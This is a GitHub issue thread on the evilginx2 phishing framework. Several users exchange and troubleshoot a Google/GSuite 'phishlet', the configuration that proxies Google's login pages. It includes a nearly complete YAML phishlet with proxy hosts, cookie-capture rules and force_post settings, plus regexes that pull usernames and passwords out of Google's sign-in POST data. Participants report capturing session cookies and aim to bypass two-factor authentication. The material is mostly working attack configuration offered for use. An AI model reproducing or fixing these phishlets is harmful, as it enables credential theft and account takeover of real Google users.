kgretzky / evilginx2

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
BSD 3-Clause "New" or "Revised" License

gsuite #836

Closed Ineed2p247 closed 1 year ago

Ineed2p247 commented 1 year ago

DO NOT ASK FOR PHISHLETS.

DO NOT ASK FOR HELP CREATING PHISHLETS.

DO NOT ASK TO FIX PHISHLETS.

DO NOT ADVERTISE OR TRY TO SELL PHISHLETS.

EXPECT A BAN OTHERWISE. THANK YOU!

REPORT ONLY BUGS OR FEATURE SUGGESTIONS.

Screenshot 2022-09-09 230107

Gsuite phishlets do not capture mail/pass, only cookies. What am I missing? Please advise.

sebastiangonzalezbotasi commented 1 year ago

What Gsuite Phishlets Are You Using?

ssl-user-en commented 1 year ago

It is because of the v3 upgrade by Google.

globally0x commented 1 year ago

@ssl-user-en can you share your google.yaml for study?

globally0x commented 1 year ago

@Ineed2p247 can you share your Gsuite Phishlets?

Ineed2p247 commented 1 year ago

@globally0x

author: '@ineed2p247' min_ver: '2.3.0'

proxy_hosts:

sub_filters:

auth_tokens:

credentials: username: key: 'f.req' search: '[]]\,\"([^"])\"\,' type: 'post' password: key: 'f.req' search: ',["([^"])",' type: 'post'

auth_urls:

login: domain: 'accounts.google.com' path: '/signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin'

force_post:

Ineed2p247 commented 1 year ago

@ssl-user-en What's the new regex to grab the password?

globally0x commented 1 year ago

@Ineed2p247 Thanks a lot, I will test now!

globally0x commented 1 year ago

@Ineed2p247 cookie caught. Great work!

Ineed2p247 commented 1 year ago

@globally0x What's the new regex to grab the password?

globally0x commented 1 year ago

@globally0x What's the new regex to grab the password?

'null,[\"([^"]*)\",'

globally0x commented 1 year ago

'null,[\"([^"]*)\",' Tested good in Chrome on Windows. It cannot be used to capture username & password on Android.

sebastiangonzalezbotasi commented 1 year ago

Hello. Has it happened to you when using Google phishlets that after adding user, password and receiving a second validation (code to the cell phone), after clicking on "next" it shows you this?

Screenshot 2022-09-21 at 20 58 25

lhost25 commented 1 year ago

@globally0x What's the new regex to grab the password?

'null,[\"([^"]*)\",'

The main issue is it's not getting user n pass, and this code shows an error during importation. Does anyone have an idea of the correct details for getting the user n pass?

globally0x commented 1 year ago

@lhost25 credentials: username: key: 'f.req' search: '"[null,\"([^"])\",' type: 'post' password: key: 'f.req' search: 'null,[\"([^"])\",' type: 'post'

lhost25 commented 1 year ago

@lhost25 credentials: username: key: 'f.req' search: '"[null,\"([^"])\",' type: 'post' password: key: 'f.req' search: 'null,[\"([^"])\",' type: 'post'

Thanks, sir, for the details, but I keep getting this error message after those credentials.

Screenshot 2022-09-29 at 12 57 51 AM

Kevin3-00 commented 1 year ago

@lhost25 credentials: username: key: 'f.req' search: '"[null,\"([^"])\",' type: 'post' password: key: 'f.req' search: 'null,[\"([^"])\",' type: 'post'

image This is what I continue to get

joemorning2 commented 1 year ago

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

image This is what I continue to get

What exactly do you want to achieve with the error message you are getting?

Kevin3-00 commented 1 year ago

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

image This is what I continue to get

What exactly do you want to achieve with the error message you are getting?

It means you can't load that phishlets to other phishlets folder

joemorning2 commented 1 year ago

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

image This is what I continue to get

What exactly do you want to achieve with the error message you are getting?

It means you can load that phishlets to other phishlets folder

Imagine: you posted a picture without being specific about the assistance you need. If I don't know and you know how to, why seek help here?

I will advise you to be specific so that people can help you. Your picture did not point out the help you need.

Human beings with their pride.

Kevin3-00 commented 1 year ago

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

image This is what I continue to get

What exactly do you want to achieve with the error message you are getting?

It means you can load that phishlets to other phishlets folder

Imagine: you posted a picture without being specific about the assistance you need. If I don't know and you know how to, why seek help here?

I will advise you to be specific so that people can help you. Your picture did not point out the help you need.

Human beings with their pride.

author: '@Ineed2p247' min_ver: '2.3.0'

proxy_hosts:

{phish_sub: 'www', orig_sub: 'www', domain: 'google.com', session: false, is_landing: false,} {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false} {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: false, is_landing: false, auto_filter: false} {phish_sub: 'play', orig_sub: 'play', domain: 'google.com', session: false, is_landing: false, auto_filter: false} {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: true , is_landing: false, auto_filter: true} {phish_sub: 'apis', orig_sub: 'apis', domain: 'google.com', session: false, is_landing: false, auto_filter: false} {phish_sub: 'content', orig_sub: 'content', domain: 'googleapis.com', session: false, is_landing: false, auto_filter: false} {phish_sub: 'youtube', orig_sub: 'accounts', domain: 'youtube.com', session: false, is_landing: false, auto_filter: false} sub_filters:

{triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'accounts.google.com', replace: 'accounts.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} {triggers_on: 'myaccount.google.com', orig_sub: 'myaccount', domain: 'google.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['application/json', 'text/html', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'application/xml']} auth_tokens:

domain: '.google.com' keys: [".,regexp"] domain: 'accounts.google.com' keys: [".,regexp"] domain: 'accounts.google.bg' keys: [".,regexp"] domain: 'myaccount.google.com' keys: [".,regexp"] domain: 'mail.google.com' keys: [".*,regexp"] credentials: username: key: 'f.req' search: '[]],"([^"])",' type: 'post' password: key: 'f.req' search: ',["([^"])",' type: 'post'

auth_urls:

'/CheckCookie' '/_/AccountSettingsUi/browserinfo' login: domain: 'accounts.google.com' path: '/signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin'

force_post:

path: '/_/signin/sl/challenge' search: {key: 'f.req', search: '.'} {key: 'continue', search: '.'} force: {key: 'continue', value: ''} type: 'post'``

Take a look at this phishlet after making corrections based on @lhost25 credentials: username: key: 'f.req' search: '"[null,\"([^"])\",' type: 'post' password: key: 'f.req' search: 'null,[\"([^"])\",' type: 'post' When you upload it, it will get uploaded and will show you there's a problem on line 7, which is what you are seeing in the photo.

Kevin3-00 commented 1 year ago
  • {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false}

{phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false} This line has a problem in the phishlet.

Kevin3-00 commented 1 year ago

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

image This is what I continue to get

What exactly do you want to achieve with the error message you are getting?

It means you can load that phishlets to other phishlets folder

Imagine: you posted a picture without being specific about the assistance you need. If I don't know and you know how to, why seek help here?

I will advise you to be specific so that people can help you. Your picture did not point out the help you need.

Human beings with their pride.

https://github.com/joemorning2

image Seriously? You joined GitHub just yesterday and your first post would be to hide as some expert on evilginx, or I guess you were here before with a different ID and got blocked. Before accusing me of being prideful, learn first. Since I showed you what the problem was, you returned to your shell and hid, isn't it? Give me a break and allow people with know-how to contribute.

rhks commented 1 year ago

Who has a working Google phishlet?

rhks commented 1 year ago

@lhost25 credentials: username: key: 'f.req' search: '"[null,\"([^"])\",' type: 'post' password: key: 'f.req' search: 'null,[\"([^"])\",' type: 'post'

This doesn't seem to work

Ineed2p247 commented 1 year ago

@rhks yes it's not working

Ineed2p247 commented 1 year ago

Thanks to y'all for the contribution, I have a working phishlet now. I will be closing my comment.

Kevin3-00 commented 1 year ago

Thanks to y'all for the contribution, I have a working phishlet now. I will be closing my comment.

Please, can we also make it work? Presently it is not capturing username, but pass and cookies.

rhks commented 1 year ago

Thanks to y'all for the contribution, I have a working phishlet now. I will be closing my comment.

Do you mind sharing your working phishlet?

sebastiangonzalezbotasi commented 1 year ago

Hello everyone, I'm having a problem and I don't understand well what is happening. I am using this version of phishlets. Running the program in localhost mode, all three steps work very well: a) user b) password c) code by SMS d) cookie capture. The problem occurs when I run the program in real mode on a server. Although I go through the steps of user, password and code by SMS, on the last accept it throws the following error:

Screenshot 2022-10-12 at 20 01 07

Support-1535 commented 1 year ago

Hello! If you were already able to resolve your doubts and achieve your goals, close the issue so that we know which ones are pending.

Thank you!